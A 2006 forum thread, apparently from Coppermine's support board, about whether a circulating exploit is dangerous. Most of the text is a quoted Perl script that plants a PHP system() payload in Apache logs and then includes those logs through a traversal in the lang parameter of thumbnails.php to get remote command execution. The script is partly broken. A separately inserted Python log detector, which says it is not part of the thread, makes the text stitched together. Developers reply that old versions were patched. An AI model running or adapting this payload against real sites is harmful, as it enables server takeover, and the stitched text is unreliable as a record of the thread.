coppermine exploit????
 


Started by derperle, December 09, 2006, 12:51:14 PM


derperle

Hello.
Here is a Coppermine exploit that is floating around on the net!!!
Is there any danger...  ??? ??? ???

#!/usr/bin/perl

use IO::Socket;
use LWP::Simple;

$| = print "
++++++++++++++++++++++++++++++++++++
+                                  +
+ Coppermine Photo Gallery 1.4.10  +
+                                  +
+ Remote Command Execution Exploit +
+                                  +
+         bd0rk || SOH-Crew        +
+                                  +
+         www.soh-crew.it.tt       +
+                                  +
++++++++++++++++++++++++++++++++++++

";

@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

if (@ARGV < 3)
{
$i = 0;
while($apache[$i])
{ print "[$i] $apache[$i]\n";$i++;}
exit();
}

$tar = $ARGV[0];
$dir = $ARGV[1];
$apachedir = $ARGV[2];

$inject="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"tar", PeerPort=>"80") or die "[-] Can't connect to Server\n\n";
print $socket "GET ".$dir.$inject." HTTP/1.1\r\n";
print $socket "User-Agent: ".$inject."\r\n";
print $socket "Host: ".$tar."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "q") {
    $socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";

print $socket "GET ".$dir."thumbnails.php?lang=".$apache[$apachedir]."%00&cmd HTTP/1.1\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";

while ($serv = <$socket>)
{
print $serv;
}
print "[shell] ";
$cmd = <STDIN>;
}


Can this be patched???

Thanks in advance
Perle
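
A defensive counterpart to the script in the post above, added here as an example and not part of the original thread: a Python check that flags the script's two request stages (PHP code written into a logged field, then a `lang` value pointing at a log file) in an Apache combined-format access log. The sample log lines, the label names and the plain-name rule for `lang` are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl

# Apache "combined" format; the request field may itself contain spaces.
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>.*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$')
# Assumption: a legitimate lang value is a plain name such as "german".
PLAIN_LANG = re.compile(r'[A-Za-z0-9_-]{1,64}')

def findings(line):
    """Return (client, labels) for one access-log line."""
    m = COMBINED.match(line)
    if not m:
        return None, {"unparsed"}
    labels = set()
    # Stage 1: a literal PHP open tag written into a logged field.
    if any("<?" in m[f] for f in ("req", "ref", "ua")):
        labels.add("php-tag-in-log")
    # Stage 2: lang is not a plain name (covers ../ and the %00 terminator).
    parts = m["req"].split(" ")
    if len(parts) >= 2:
        query = parts[1].partition("?")[2]
        for key, value in parse_qsl(query, keep_blank_values=True):
            if key == "lang" and not PLAIN_LANG.fullmatch(value):
                labels.add("lang-not-plain-name")
    return m["host"], labels

def clients_with_both_stages(lines):
    """Clients that planted a PHP tag and also sent a non-plain lang value."""
    seen = {}
    for line in lines:
        host, labels = findings(line)
        if host:
            seen.setdefault(host, set()).update(labels)
    both = {"php-tag-in-log", "lang-not-plain-name"}
    return sorted(h for h, got in seen.items() if both <= got)

# Constructed sample lines: documentation addresses, harmless PHP body.
SAMPLE = [
    '203.0.113.5 - - [09/Dec/2006:12:40:01 +0100] "GET /cpg/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [09/Dec/2006:12:41:10 +0100] "GET /cpg/<?php echo 1;?> HTTP/1.1" 404 210 "-" "<?php echo 1;?>"',
    '203.0.113.9 - - [09/Dec/2006:12:41:15 +0100] "GET /cpg/thumbnails.php?lang=../../logs/access.log%00&cmd HTTP/1.1" 200 900 "-" "-"',
    '203.0.113.7 - - [09/Dec/2006:12:42:00 +0100] "GET /cpg/thumbnails.php?album=2&lang=german HTTP/1.1" 200 4000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(findings(entry))
    print(clients_with_both_stages(SAMPLE))
```
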

Stramm

If I remember correctly, this was fixed with CPG 1.3.5 and during the 1.4 beta phase (~Sept. 2005)

Joachim Müller

Correct: only ancient versions should be vulnerable to this. One of the reasons why we keep pointing out the importance of updates.

In future, please do not start German-language threads in the English-language part of the forum. Nibbler has moved your post accordingly.

derperle

Understood. I'll keep that in mind.
Thanks for the tip.

Perle